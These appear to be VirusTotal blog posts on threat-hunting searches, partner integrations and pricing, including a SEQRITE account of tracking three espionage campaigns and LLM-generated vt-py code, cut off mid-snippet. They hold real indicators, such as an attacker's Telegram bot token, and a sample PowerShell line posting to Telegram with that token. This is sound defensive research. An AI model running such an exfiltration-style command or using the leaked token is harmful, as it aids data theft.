It’s a pragmatic shift: AI reasoning where it scales, human expertise where it matters most, helping defenders see further, faster, and with greater context than ever before.

November is the Month of Searches: Explore, Learn, and Share with #MonthOfVTSearch

3 November 2025 at 17:05
This November, we’re celebrating the power of VirusTotal Enterprise search!
All VirusTotal customers will enjoy uncapped searches through the GUI, with no quota consumption for the entire month, as long as they are manual searches via the web interface.
Whether you’re investigating malware campaigns, analyzing infrastructure, or tracking threat actor activity, this is your chance to search freely and explore advanced use cases using VirusTotal Intelligence.
Experiment with powerful VT search modifiers to uncover patterns, hunt for related samples, and pivot across hashes, domains, IP addresses, or URLs — without worrying about your quota.

What’s happening

  • No quota consumption for all GUI searches during November (API requests will continue to consume quota).
  • Every day, we’ll share interesting and creative search queries on our LinkedIn and X channels using the hashtag #MonthOfVTSearch.
  • We invite you to try these searches, interact with us, and share your own search tips and findings with the community.

Learn and level up

Make the most of this month to sharpen your threat-hunting skills:

Example: Day 1 Search Query

To kick off #MonthOfVTSearch, here’s the first advanced query we’re sharing with the community:

What this query does:

This search helps identify document files that, when executed in a sandbox environment, show behavior consistent with potential malicious activity involving .ru infrastructure. It specifically looks for:
  • Documents (type:document) that were uploaded to VT.
  • During execution, they show process behavior containing:
    • HTTP traffic (behavior_processes:*http*)
    • The string DavSetCookie (often observed in HTTP request headers or custom cookie operations)
    • And references to .ru domains
  • And additionally, they show network or embedded indicators related to .ru domains via:
    • Behavior-based network connections (behavior_network:*.ru*), or
    • Embedded domains or URLs within the file (embedded_domain:*.ru*, embedded_url:*.ru*)

Join the community

Let’s make November a month of discovery and collaboration! Tag your posts with #MonthOfVTSearch, share your favorite searches, and show the world how you use VirusTotal to explore and understand the threat landscape.
In the meantime, if you have any feedback you can contact us.

Hugging Face and VirusTotal: Building Trust in AI Models

23 October 2025 at 09:41

We’re happy to announce a collaboration with Hugging Face, an open platform that fosters collaboration and transparency in AI, to make security insights more accessible to the community. VirusTotal’s analysis results are now integrated directly into the Hugging Face platform, helping users understand potential risks in model files, datasets, and related artifacts before they download them.

Security context where you need it

When you browse a file on Hugging Face, you’ll now see security information coming from different scanners, including VirusTotal results. In the example below, VirusTotal detects the file as unsafe and links directly to its public report for full details.

Addressing new challenges

As AI adoption grows, we see familiar threats taking new forms, from tampered model files and unsafe dependencies to data poisoning and hidden backdoors. These risks are part of the broader AI supply chain challenge, where compromised models, scripts, or datasets can silently affect downstream applications.

At VirusTotal, we’re also evolving to meet the challenges of this new landscape. We’re developing AI-driven analysis tools such as Code Insight, which uses LLMs to understand and explain code behavior, and we’re adding support for specialized tools for model/serialization formats, including picklescan, safepickle, and ModelScan, to help surface risky patterns and unsafe deserialization flows.

Our collaboration with Hugging Face strengthens this effort. By connecting VirusTotal’s analysis with Hugging Face’s AI Hub, we can expand our research into threats targeting AI models and share that visibility across the industry, helping everyone build better defenses, tools, and approaches to improve global security.

Stronger together

This collaboration is part of our ongoing mission to make security intelligence simpler and more accessible. It follows our recent effort to streamline VirusTotal access and API usage for the community, and now extends that same spirit into the AI space.

We believe that openness, collaboration, and shared knowledge are the best defenses against evolving threats. Hugging Face and VirusTotal share that vision: empowering researchers, developers, and defenders worldwide to build safely and openly.

VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone

21 October 2025 at 10:40

Introduction

One of the best parts of being at VirusTotal (VT) is seeing all the amazing ways our community uses our tools to hunt down threats. We love hearing about your successes, and we think the rest of the community would too.
That's why we're so excited to start a new blog series where we'll be sharing success stories from some of our customers. They'll be giving us a behind-the-scenes look at how they pivot from an initial clue to uncover entire campaigns.
To kick things off, we're thrilled to have our friends from SEQRITE join us. Their APT-Team is full of incredible threat hunters, and they've got a great story to share about how they've used VT to track some sophisticated actors.

How VT plays a role in hunting for analysts

For a threat analyst, the hunt often begins with a single, seemingly isolated clue—a suspicious file, a strange domain, or an odd IP address. The challenge is to connect that one piece of the puzzle to the larger picture. This is where VT truly shines.
VT is more than just a tool for checking if a file is malicious. It's a massive, living database of digital artifacts (process activity, registry key activity, memory dumps, LLM verdicts, among others) and their relationships. It allows analysts to pivot from one indicator of compromise to another, uncovering hidden connections and mapping out entire attack campaigns. It's this ability to connect the dots—to see how a piece of malware communicates with a C2 server, what other files are associated with it, what processes were launched or files were used to set persistence or exfiltrate information, and who else has seen it—that transforms a simple file check into a full-blown investigation. The following story from SEQRITE is a perfect example of this process in action.

Seqrite - Success Story

[In the words of SEQRITE…]
We at the SEQRITE APT-Team carry out a range of activities, including threat hunting and threat intelligence, using customer telemetry and several other data corpora. Alongside our customer telemetry, the VT corpus has contributed substantially to our research: it has supported hunts for unique campaigns and multiple pivots that led us to an interesting set of campaigns across Central, South, and East Asia.

UNG0002

The SEQRITE APT-Team has been tracking a South-East Asian threat entity, termed UNG0002, using certain behavioral artefacts, such as the same OPSEC mistakes and a similar set of decoys and post-exploitation toolkit repeated across multiple operational campaigns from May 2024 to May 2025.
During the initial phase of this campaign, the threat actor targeted multiple organizations across Hong Kong and Pakistan in sectors including defence, electrotechnical engineering, medical science, and academia.
VT corpus has helped us to pivot through Cobalt Strike oriented beacons, which were used by this threat actor to target various sectors. In our hunt for malicious activity, we discovered a series of Cobalt Strike beacons. These were all delivered through similar ZIP files, which acted as lures. Each ZIP archive contained the same set of file types: a malicious executable, along with LNK, VBS, and PDF decoy files. The beacons themselves were also similar, sharing configurations, filenames and compilation timestamps.
Using the timestamps from the malicious executables and the filenames previously mentioned, we discovered up to 14 different samples, all of them related to the campaign, with this query:
VirusTotal query: metadata:"2015:07:10 03:27:31+00:00" filename:"imebroker.exe"

Based on the configuration extracted by VT, we could use the extracted public key to identify more samples using exactly the same key with the following query:
malware_config:30819f300d06092a864886f70d010101050003818d003081890281810096cc4e6ad9aee91ca69b7b44465e17412626a11c7855b7a69daad00f48c0ea98f0e389a0a1c4b74332bf0d603a6e53e05ee734c9a289ff172204bfc9430ed4d6041402d02b526e902b95f6f219598cb1b6391403fa627ab36dbe88646620369e7ec89bdc31f1a2b0bedba1852d5e7656d3b297f9d39f357816f0677563bc496b020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Besides these executables, the ZIP files also contained LNK files. Analyzing them revealed consistent LNK-ID metadata, with the same identifiers appearing across many samples. Querying VT for those LNK-IDs let us identify new files related to the campaign.
VirusTotal query: metadata:"laptop-g5qalv96"
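
The pivots above follow one pattern: take a value extracted from a known sample and wrap it in a search modifier. Below is a minimal sketch of that step, assuming a hypothetical helper named build_query (it is not part of any VirusTotal library). It only assembles the query text, using the modifier names and values quoted in this post, and does not contact VirusTotal.

```python
def build_query(*terms: tuple[str, str]) -> str:
    """Join (modifier, value) pairs into one space-separated search string.

    Hypothetical helper for illustration only. Every value is wrapped in
    double quotes, so values that already contain a double quote are rejected.
    """
    parts = []
    for modifier, value in terms:
        if '"' in value:
            raise ValueError(f"value for {modifier!r} contains a double quote")
        parts.append(f'{modifier}:"{value}"')
    return " ".join(parts)


# Compilation timestamp plus filename shared by the beacons
beacon_query = build_query(
    ("metadata", "2015:07:10 03:27:31+00:00"),
    ("filename", "imebroker.exe"),
)

# Machine identifier recovered from the LNK metadata
lnk_query = build_query(("metadata", "laptop-g5qalv96"))

print(beacon_query)
print(lnk_query)
```

Keeping the indicators as data rather than hand-typed strings makes it easier to rerun the same pivots when a new sample yields a new timestamp or machine identifier.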

Decoy documents identified within the ZIP files mentioned above

We initially tracked several campaigns leveraging LNK-based device IDs and Cobalt Strike beacons. However, an intriguing shift began to emerge in the September-October activity. We observed a new set of campaigns that frequently used CV-themed decoys, often impersonating students from prominent Chinese research institutions.
While the spear-phishing tactics remained similar, the final execution changed. The threat actors dropped their Cobalt Strike beacons and pivoted toward DLL-Sideloading for their payloads, all while keeping the same decoy theme. This significant change in technique led us to identify a second major wave of this activity, which we're officially labeling Operation AmberMist.
Tracking this second wave of operations attributed to the UNG0002 cluster, we observed a recurring behavioral artifact: the use of academia-themed lures targeting victims in China and Hong Kong.
Across these campaigns, multiple queries were leveraged, but a consistent pattern emerged—heavy reliance on LOLBINS such as wscript.exe, cscript.exe, and VBScripts for persistence.
By developing a simple yet effective hunting query, we were able to uncover a previously unseen sample not publicly reported:
VirusTotal query: type:zip AND (metadata:"lnk" AND metadata:".vbs" AND metadata:".pdf") and submitter:HK

Silent Lynx

Another campaign tracked by the SEQRITE APT-Team, named Silent Lynx, targeted multiple sectors, including banking. As in the previously described case, thanks to VT we were able to pivot and identify new samples associated with this campaign.
Initial Discovery and Pivoting
During the initial phase of this campaign, we discovered a decoy-based SPECA-related archive file targeting Kyrgyzstan around December 2024 - January 2025. The decoy was designed to distract from the real payload: a malicious C++ implant.
Decoy document identified during our research

Second campaign of Silent Lynx @ Bank of Kyrgyz Republic
Email identified during our research

We performed multiple pivots focusing on the implant. Starting from the sample’s metadata, network indicators, and functionality, we found that the threat actor had been using a similar C++ implant, which led us to another Silent Lynx campaign targeting the banking sector of Kyrgyzstan.
Information obtained during the analysis of the C++ implants

Information obtained during the analysis of the C++ implants

We leveraged the VT corpus to deploy multiple Livehunt rules at various points in the investigation. Some of the simpler examples are as follows:
  • Looking at the usage of encoded Telegram Bot based payload inside the C++ implant. Using either content or malware_config modifiers when extracted from the config could help us to identify new samples.

  • Spawning Powershell.exe LOLBIN.

  • VT search enablers for checking for malicious email files, if uploaded from Central Asian Geosphere.

  • ISO-oriented first-stagers.

  • Multiple behavioral overlaps between YoroTrooper & Silent Lynx and further hunting hypothesis developed by us. 

Leveraging the VT corpus and pivoting further on the metrics above, and on many others found in the malicious spear-phishing email, we also tracked additional campaigns. Most importantly, each time we developed a new YARA rule and a new hypothesis to hunt for similar implants with the Livehunt feature, tailored to the specifications and raw data we received during hunting, and keeping false positives and false negatives in mind.
Decoy document identified during our hunting activities

Submissions identified in the decoy document

The threat actor repeatedly used the same implant across multiple campaigns in Uzbekistan and Turkmenistan. Using hunting queries through VT along with submitter:UZ or submitter:TM helped us to identify these samples.
The most important pivot in our investigation was the malware sample itself: as shown in the previous screenshots, it used an encoded PowerShell blob that spawned powershell.exe, a pattern repeated across different campaigns. This sample acted as a key indicator, allowing us to uncover other campaigns targeting critical sectors in the region, and confirmed the repetitive nature of the actor's operations.
We also used VT's Collections feature to build an attribution of the threat entity.
Collections used during the attribution process

DragonClone

Finally, the last campaign that illustrates how pivoting within the VT ecosystem enabled our team to uncover new samples is one run by a group we named DRAGONCLONE.
The SEQRITE APT Team has been monitoring DRAGONCLONE as they actively target critical sectors across Asia and the globe. They utilize sophisticated methods for cyber-espionage, compromising strategic organizations in sectors like telecom and energy through the deployment of custom malware implants, the exploitation of unpatched vulnerabilities, and extensive spear-phishing.
Initial Discovery
Recently, on 13th May, our team discovered a malicious ZIP file that surfaced across various sources, including VT. The ZIP file was used as a preliminary infection vector and contained multiple EXE and DLL files inside the archive, like this one which contains the malicious payload.
Chinese-based threat actors have a well-known tendency to deliver DLL sideloading implants as part of their infection chains. Leveraging crowdsourced Sigma rules in VT, along with personal hunting techniques using static YARA signatures, we were able to track and hunt this malicious spear-phishing attachment effectively. In their public Sigma Rules list you can find different Sigma Rules that are created to identify DLL SideLoading.
Pivoting Certificates via VT Corpus
While exploring the network of related artifacts, we could not initially find any direct commonalities. However, a particular clean-looking executable named “2025 China Mobile Tietong Co., Ltd. Internal Training Program” raised our concern. Its naming and metadata suggested potential masquerading behavior, making it a critical pivot point that required deeper investigation.
Certificates are among the most important indicators when examining malicious artefacts. The file turned out to be a fresh, clean copy of WonderShare’s Repairit Software, a well-known tool for repairing corrupted files; the suspicious part is that it was signed by ShenZhen Thunder Networking Technologies Ltd.
VirusTotal query: signature:"ShenZhen Thunder Networking Technologies Ltd."

Following this hunch, we hunted for executables signed with the same certificate and found multiple malicious binaries. This was not the only indicator or pivot, but it was a key one for further research.
Pivoting on Malware Configs via VT Corpus
We analyzed the loader and determined it's slightly advanced, performing complex tasks like anti-debugging. More significantly, it drops V-Shell, a post-exploitation toolkit. V-Shell was originally open-source but later taken down by its authors and has been observed in campaigns by Earth Lamia.
After extracting the V-Shell shellcode, we discovered an unusual malware configuration property: qwe123qwe. By leveraging the VT corpus to pivot on this finding, we were able to identify additional V-Shell implant samples potentially linked to this campaign.
VirusTotal query: malware_config:"qwe123qwe"

VT Tips (based on the success story)

[In the words of VirusTotal…]
Threat hunting is an art, and a good artist needs the right tools and techniques. In this section, we'll share some practical tips for pivoting and hunting within the VirusTotal ecosystem, inspired by the techniques used in the campaigns discussed in this blog post.

Hunt by Malware Configuration

Many malware families use configuration files to store C2 information, encryption keys, and other operational data. For some malware families, VirusTotal automatically extracts these configurations. You can use unique values from these configurations to find other samples from the same campaign.
For instance, in the DRAGONCLONE investigation, the V-Shell implant had an unusual malware configuration property: qwe123qwe. A simple query like malware_config:"qwe123qwe" in VT can reveal other samples using the same configuration. Similarly, the Cobalt Strike beacons used by UNG0002 had a unique public key in their configuration that could be used for pivoting. That's thanks to Backscatter. We've written blogs showing how to do advanced hunting using only the malware_config modifier. Remember that you can search for samples by family name, like malware_config:"redline", by Telegram token, and even by URLs present in the malware configuration, like malware_config:"https://steamcommunity.com/profiles/76561198780612393".
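
When several configuration values are available, it can help to see which samples match more than one of them. The following is a rough sketch under stated assumptions: collect_hashes and overlapping are hypothetical helper names, and the client argument is expected to behave like a vt-py vt.Client, whose iterator() method yields objects with an id attribute (the SHA-256 for files).

```python
from typing import Iterable


def collect_hashes(client, queries: Iterable[str], per_query_limit: int = 50) -> dict[str, set[str]]:
    """Map each matching file ID to the set of queries that returned it.

    `client` is assumed to expose iterator(path, params=..., limit=...) in the
    style of vt.Client; nothing here is specific to one malware family.
    """
    seen: dict[str, set[str]] = {}
    for query in queries:
        results = client.iterator(
            "/intelligence/search",
            params={"query": query},
            limit=per_query_limit,
        )
        for file_obj in results:
            seen.setdefault(file_obj.id, set()).add(query)
    return seen


def overlapping(seen: dict[str, set[str]], minimum: int = 2) -> list[str]:
    """Return file IDs matched by at least `minimum` distinct queries, sorted."""
    return sorted(file_id for file_id, hits in seen.items() if len(hits) >= minimum)
```

With vt-py installed, a call might look like collect_hashes(vt.Client(API_KEY), ['malware_config:"qwe123qwe"', ...]), where API_KEY is a placeholder for your own key. Inside a notebook that already runs an event loop, the asynchronous async for form of iteration may be needed instead of the plain for loop used here.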

Don't Overlook LNK File Metadata

Threat actors often make operational security (OPSEC) mistakes. One common mistake is failing to remove metadata from files, including LNK (shortcut) files. This metadata can reveal information about the attacker's machine, such as the hostname.
In the UNG0002 campaign, the actor consistently used LNK files with the same metadata, specifically the machine identifier laptop-g5qalv96. Attackers can also forge this information to mislead security researchers, but it often still provides useful leads for tracking them. This allowed the SEQRITE team to uncover a wider set of samples by querying VirusTotal for this metadata string.

Track Actors via Leaked Bot Tokens

Some malware, especially those using public platforms for command and control, will have hardcoded API tokens. As seen in the "Silent Lynx" campaign, a PowerShell script used a hardcoded Telegram bot token for C2 communication and data exfiltration.
These tokens can be extracted from memory dumps during sandbox execution or from the malware's code itself. Once you have a token, you may be able to track the threat actor's commands and even identify other victims, as was done in the Silent Lynx investigation. A concrete example of using Telegram bot tokens is the query malware_config:"bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8", which is associated with four infostealer samples uploaded between 2024 and 2025.
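
As an illustration of the extraction step, the sketch below pulls Telegram-style bot tokens out of a block of text (for example, strings dumped from a script) and turns them into malware_config queries of the form shown above. The token shape used by the regular expression (8 to 10 digits, a colon, then 35 characters from A-Z, a-z, 0-9, underscore, and hyphen) is an assumption based on commonly observed tokens, not an official specification, and the helper names and the sample command line are made up for the example.

```python
import re

# Assumed token shape (illustrative, not an official specification):
# numeric bot ID, a colon, then a 35-character secret.
BOT_TOKEN_RE = re.compile(
    r"(?<![0-9])(\d{8,10}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])"
)


def extract_bot_tokens(text: str) -> list[str]:
    """Return unique '<bot_id>:<secret>' tokens in order of first appearance."""
    found: list[str] = []
    for match in BOT_TOKEN_RE.finditer(text):
        token = f"{match.group(1)}:{match.group(2)}"
        if token not in found:
            found.append(token)
    return found


def to_config_query(token: str) -> str:
    """Build a malware_config search string in the form used in this post."""
    return f'malware_config:"bot{token}"'


# Made-up command line embedding the token quoted in this post
sample_strings = (
    "Invoke-WebRequest https://api.telegram.org/"
    "bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8/sendMessage"
)

for token in extract_bot_tokens(sample_strings):
    print(to_config_query(token))
```

The pattern is deliberately strict about length to reduce false matches on ordinary "number:text" strings; loosening it would trade precision for recall.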

Leverage Code-Signing Certificates

Threat actors sometimes sign their malicious executables to make them appear legitimate. They may use stolen certificates or freshly created ones. These certificates can be a powerful pivot point.
In the DRAGONCLONE case, a suspicious executable was signed by "ShenZhen Thunder Networking Technologies Ltd.". By searching for other files signed with the same certificate (signature:"ShenZhen Thunder Networking Technologies Ltd."), you can uncover other tools in the attacker's arsenal.

Utilize YARA and Sigma Rules

For proactive hunting, you can develop your own YARA rules to find malware families based on unique strings, code patterns, or other characteristics. This was a key technique in the "Silent Lynx" campaign for hunting similar implants.
Additionally, you can leverage the power of the community by using crowdsourced Sigma rules in VirusTotal, even within your YARA rules. These rules can help you identify malicious behaviors, such as the DLL sideloading techniques used by DRAGONCLONE, directly from sandbox execution data.
For example, if you want to search for the Sigma rule "Potential DLL Sideloading Of MsCorSvc.DLL" in VT files, you can use the query sigma_rule:99b4e5347f2c92e8a7aeac6dc7a4175104a8ba3354e022684bd3780ea9224137 to do so. All the Sigma rules are updated from the public repo and can be consumed here.

Conclusion

The success stories of the SEQRITE APT-Team in tracking campaigns like UNG0002, Silent Lynx, and DRAGONCLONE demonstrate the power of VirusTotal as a collaborative and comprehensive threat intelligence platform. By leveraging a combination of malware configuration analysis, metadata pivoting, and community-driven tools like YARA and Sigma rules, security researchers can effectively uncover and track sophisticated threat actors.
These examples highlight that successful threat hunting is not just about having the right tools, but also about applying creative and persistent investigation techniques. The ability to pivot from one piece of evidence to another is crucial in connecting the dots and revealing the full scope of a campaign. The SEQRITE team has demonstrated a deep understanding of these pivoting techniques, and we appreciate that they have decided to share their valuable insights with the rest of the community.
We hope these tips and stories have been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.
If you have a success story of using VirusTotal that you would like to share with the community, we would be delighted to hear from you. Please reach out to us at practitioners@virustotal.com, and we will be happy to feature your story in a future blog post.
Together, we can make the digital world a safer place.

Simpler Access for a Stronger VirusTotal

8 October 2025 at 18:17

VirusTotal (VT) was founded on a simple principle: we are all stronger when we work together. Every file shared, every engine integrated, and every rule contributed strengthens our collective defense against cyber threats.

In the spirit of that collaboration, and in light of recent community discussions, we want to share our vision for the future of the platform. We have heard your feedback on the need for simplicity and accessibility, and we are taking action. VT will continue to be broadly available with straightforward options, including a robust free tier for our contributors and community.

Our commitment is to ensure the long-term health and openness of the platform. To do that, we are focused on three key goals:

  • Preserve VT as an open, collaborative platform built for the common good.
  • Provide our contributors with a reliable, cost-effective, and long-term framework for partnership.
  • Improve access to advanced features for academics, researchers, and defenders dedicated to public service.

Today, Google Threat Intelligence offers new ways to access advanced and curated threat intelligence, powered by the combined intelligence of VT, Mandiant and Google. As part of this broader evolution, we’re making sure VT remains open and transparent, while offering flexible options that meet the needs of our diverse users, from security researchers and startups to MSSPs and other security vendors.

VT now offers simpler pricing with tiers optimized for our partner contributors and community. We’re also introducing a Contributor Tier, a dedicated model for our engine partners. It ensures continuous access to VT feeds, priority support, and early access to new features. This tier recognizes their essential role in keeping VirusTotal open, collaborative, and globally impactful.

Key Access Tiers
Tier | For Who | Key Features | Annual Price
VT Community | Individual researchers, academics, educators. | File scanning, URL scanning, public API, community features. | Free.
VT Contributor | Technological partners contributing detection engines. | Feed of blindspots for free and discounts based on contribution tiers. | From free (feed of blindspots) upon program acceptance.
VT Lite | Small teams, early-stage startups, small MSSPs, SMB. Non-commercial. | Advanced search, YARA hunting, File downloading, Private API, Private Scanning. Low-moderate usage. | From $5k for low API volumes.
VT Duet | Large organizations. | Full feature set, high API quota. Community Intelligence only. | Based on number of affiliates covered and contribution level.

You’ll notice that security vendors who do not contribute detections are not included in these tiers, as we are reaffirming our long-standing 2016 commitment to a healthy community. We welcome any organization to become a contributor and join us in protecting the common good. If you want to contribute, please let us know.

While Google Threat Intelligence will continue to deliver advanced threat context for enterprise customers, VirusTotal will always remain the collaborative, transparent, and community-driven foundation.

Thank you for helping us make this possible. We’re here to build the next chapter with you, not just for you.

Bernardo Quintero
Founder of VirusTotal

Crowdsourced AI += Exodia Labs

1 October 2025 at 12:02

We’re adding a new specialist to VirusTotal’s Crowdsourced AI lineup: Exodia Labs, with an AI engine focused on analyzing Chrome extension (.CRX) files. This complements our existing Code Insight and other AI contributors by helping users better understand this format and detect possible threats.

What you get in VirusTotal

  • Second opinion for .CRX: Exodia Labs adds another AI analysis stream alongside Code Insight. It gives a fresh, independent view on the same sample type. Like all Crowdsourced AI engines, it’s meant to complement (not replace) traditional detections and human analysis.
  • Clear verdict in the UI: Each Exodia report includes a simple verdict (benign, suspicious, or malicious) to help you quickly spot risky extensions.
  • Searchable results in VT Intelligence: You can now use new operators to search and pivot across Exodia Labs results:
    • exodialabs_ai_verdict:malicious | suspicious | benign
    • exodialabs_ai_analysis:<keywords>

See it in action

Here are a few Exodia Labs AI report examples you can explore in VT:

31da559ae4af91106e0a18740d6bb8916e2017f6a37a02ea2a8127f1da30ec77

69c926ea84536bdaba7e4f765bde65eb0199ac30be3a96729a21ea7efa48d721

You can also explore Exodia Labs verdicts at scale using VirusTotal Intelligence.

For example, the following query lists Chrome extensions flagged as malicious and related to financial activity: exodialabs_ai_verdict:malicious AND exodialabs_ai_analysis:financial


This search shows several .CRX files where Exodia Labs AI detected suspicious financial behavior.

Let’s look at two examples:

  • Westpac Extension: Exodia Labs flags it as malicious. The AI analysis shows the extension connects to a remote WebSocket server and exfiltrates cookies, one-time passwords, and payment tokens. It manipulates banking pages and forwards captured credentials to a C2, showing signs of credential theft and financial data tampering.
    34244257f633e104d06b0c4273caca96eb916d26540eeea68495707cbc920bdb

  • Spidy Extension: Also flagged as malicious. The analysis shows it requests permissions including cookies, executes remote crawling jobs, and collects user profile and bank account details. The extension behaves like a data-exfiltration client handling financial credentials not mentioned in its public description.
    718eab32b5597e479d63f1d4e6402b7844eb9a4ee01c9028e44eb202d5ebcb2f

About Exodia Labs

Exodia Labs builds AI-driven analysis for Chrome Web Store extensions, also exposing a browser add-on that lets users request an AI assessment directly from an extension’s store page and view a detailed report plus a verdict. For security teams, the same analysis powers the backend results we index in VirusTotal.

Join Crowdsourced AI

Crowdsourced AI is about aggregating independent AI solutions that explain behavior and provide judgments across many file types, helping you understand unfamiliar code faster and spot novel threats sooner. If you build AI solutions that can help the community, we want to hear from you.

Advanced Threat Hunting: Automating Large-Scale Operations with LLMs

30 September 2025 at 10:16

Last week, we were fortunate enough to attend the fantastic LABScon conference, organized by the SentinelOne Labs team. While there, we presented a workshop titled 'Advanced Threat Hunting: Automating Large-Scale Operations with LLMs.' The main goal of this workshop was to show attendees how they could automate their research using the VirusTotal API and Gemini. Specifically, we demonstrated how to integrate the power of Google Colab to quickly and efficiently generate Jupyter notebooks using natural language.

It goes without saying that the use of LLMs is a must for every analyst today. For this reason, we also want to make life easier for everyone who uses the VirusTotal API for research.

The Power of the VirusTotal API and vt-py

The VirusTotal API is the programmatic gateway to our massive repository of threat intelligence data. While the VirusTotal GUI is great for agile querying, the API unlocks the ability to conduct large-scale, automated investigations and access raw data with more pivoting opportunities.

To make interacting with the API even easier, we recommend using the vt-py library. It simplifies much of the complexity of HTTP requests, JSON parsing, and rate limit management, making it the go-to choice for Python users.

From Natural Language to Actionable Intelligence with Gemini

To bridge the gap between human questions and API queries, we can leverage the Gemini integration in Google Colab. We have created a "meta Colab" notebook (which we will share soon) that is pre-populated with real, working code snippets for interacting with the VirusTotal API to retrieve information such as campaigns, threat actors, malware, samples, and URLs, among others. This provides Gemini with the necessary context to understand your natural language requests and generate accurate Python code to query the VirusTotal API. Gemini doesn't call the API directly; it creates the code snippet for you to execute.

For Gemini to generate accurate and relevant code, it needs context. Our meta Colab notebook is filled with examples that act as a guide. For complex questions, it helps to provide the exact field names that you want to work with. This context generally falls into two categories:

  1. Reference Documentation: We include detailed documentation directly in the Colab. For example, we provide a comprehensive list of all available file search modifiers for the VirusTotal Intelligence search endpoint. This gives Gemini the "vocabulary" it needs to construct precise queries.
  2. Working Code Examples: The notebook is pre-populated with dozens of working vt-py code snippets for common tasks like retrieving file information, performing an intelligence search, or getting relationships. This gives Gemini the "grammar" and correct patterns for interacting with our API.

Example of code snippet context that we have included in our meta colab:

query_results_with_behaviors = []
query = "have:sigma have:yara have:ids have:malware_config fs:1d+ have:bundled_file tag:overlay"
RELATIONS = "behaviours"

async for itemobj in cli.iterator('/intelligence/search',params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): '*'},limit=0):
    query_results_with_behaviors.append(itemobj.to_dict())

res_with_behaviors = list(query_results_with_behaviors)
Diagram showing the flow from User's Action to Actionable Intelligence via Gemini and VirusTotal API

Practical Example: Hunting for Malicious LNK Files

One of the exercises in our workshop focused on analyzing malicious LNK files submitted to VirusTotal in a specific period of time to limit results. The goal was to discover common execution techniques and interesting command-line patterns.

Here’s how you could approach this with natural language queries in our meta Colab:

1. Retrieve all LNK file objects matching the criteria.

You can start by asking Gemini:

Create a code snippet to retrieve all LNK files submitted from January 1st, 2025, until April 1st, 2025, with 5 or more positives.

Code generated:

query_results = []

# Query for LNK files submitted between January 1st, 2025, and April 1st, 2025, with 5 or more positives.
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

async for itemobj in cli.iterator('/intelligence/search',params={'query': "%s"%(query)},limit=0):
    query_results.append(itemobj.to_dict())

lnk_files = list(query_results)
print(f"Found {len(lnk_files)} LNK files matching the criteria.")
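
The query string above can also be assembled from date objects, which avoids typos when the window changes between runs. This is a small sketch with a hypothetical helper name (lnk_window_query); it reproduces the same modifiers used in the generated query and performs no API call.

```python
from datetime import date


def lnk_window_query(start: date, end: date, min_positives: int) -> str:
    """Build a first-submission window query for LNK files.

    Uses the same modifiers as the generated query: an fs: lower bound,
    an fs: upper bound, a minimum number of positives, and type:lnk.
    """
    if end < start:
        raise ValueError("end date precedes start date")
    return (
        f"fs:{start.isoformat()}+ fs:{end.isoformat()}- "
        f"p:{min_positives}+ type:lnk"
    )


query = lnk_window_query(date(2025, 1, 1), date(2025, 4, 1), 5)
print(query)
```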

2. Flatten the data and visualize it.

Next, you can ask Gemini to process the retrieved data and create visualizations:

Flatten the data in a dataframe and create a bar chart depicting the most common TargetFileDOSName values.

Code generated:

import pandas as pd
import plotly.express as px

# Extract the 'attributes' dictionary from each object in our results
attributes_list = [result.get('attributes', {}) for result in lnk_files]

# Use json_normalize to create a flat DataFrame
df_flat = pd.json_normalize(attributes_list)

# Check if 'exiftool.TargetFileDOSName' column exists and is not empty
if 'exiftool.TargetFileDOSName' in df_flat.columns and not df_flat['exiftool.TargetFileDOSName'].empty:
    # Count the occurrences of each TargetFileDOSName
    target_file_counts = df_flat['exiftool.TargetFileDOSName'].value_counts().reset_index()
    target_file_counts.columns = ['TargetFileDOSName', 'Count']

    # Get the top 10 most common TargetFileDOSName values for visualization
    top_target_files = target_file_counts.head(10)

    # Create an interactive bar chart
    fig = px.bar(top_target_files,
                 x='Count',
                 y='TargetFileDOSName',
                 orientation='h',
                 title='Top 10 Most Common TargetFileDOSName in LNK files',
                 labels={'Count': 'Number of Occurrences', 'TargetFileDOSName': 'Target File DOS Name'})
    fig.show()
else:
    print("The 'exiftool.TargetFileDOSName' column was not found or is empty in the flattened data.")

print("DataFrame shape:", df_flat.shape)
df_flat.head()

This will generate a code snippet using pandas and Plotly to give you a clear view of the most frequent target files in the malicious LNKs.
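
The dotted column names such as exiftool.TargetFileDOSName come from flattening nested dictionaries. The sketch below is a plain-Python approximation of that flattening, roughly what pd.json_normalize does for nested dicts, followed by the same frequency count. The sample records and the flatten helper are made up for illustration and are not real VirusTotal data.

```python
from collections import Counter


def flatten(record: dict, parent: str = "", sep: str = ".") -> dict:
    """Flatten nested dicts into one level, joining keys with `sep`."""
    flat = {}
    for key, value in record.items():
        name = f"{parent}{sep}{key}" if parent else key
        if isinstance(value, dict):
            flat.update(flatten(value, name, sep))
        else:
            flat[name] = value
    return flat


# Made-up records shaped like the 'attributes' dictionaries used above
attributes_list = [
    {"exiftool": {"TargetFileDOSName": "cmd.exe"}, "lnk_info": {"machine_id": "host-a"}},
    {"exiftool": {"TargetFileDOSName": "powershell.exe"}, "lnk_info": {"machine_id": "host-a"}},
    {"exiftool": {"TargetFileDOSName": "cmd.exe"}, "lnk_info": {"machine_id": "host-b"}},
    {"lnk_info": {"machine_id": "host-c"}},  # record without exiftool data
]

rows = [flatten(attrs) for attrs in attributes_list]

# Count target names, skipping records where the field is missing
counts = Counter(
    row["exiftool.TargetFileDOSName"]
    for row in rows
    if "exiftool.TargetFileDOSName" in row
)
print(counts.most_common(10))
```

Records that lack a field simply do not get that key, which is why the generated code checks that the column exists before counting.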

3. Visualize relationships with a Sankey diagram.

To dig deeper and understand the relationships between the machines on which the LNK files were created and the files they point to, you can ask for a more advanced visualization:

Create a Sankey diagram connecting MachineID (source) to TargetFileDOSName (target), with link widths representing the number of occurrences. Include only MachineID values with 10 or more occurrences, grouping the rest as "Other", and make the visualization interactive with hover details.

Code generated:

import plotly.graph_objects as go
import pandas as pd

# Ensure df_flat is available from previous steps
# If not, you might need to re-run the cell that creates df_flat.

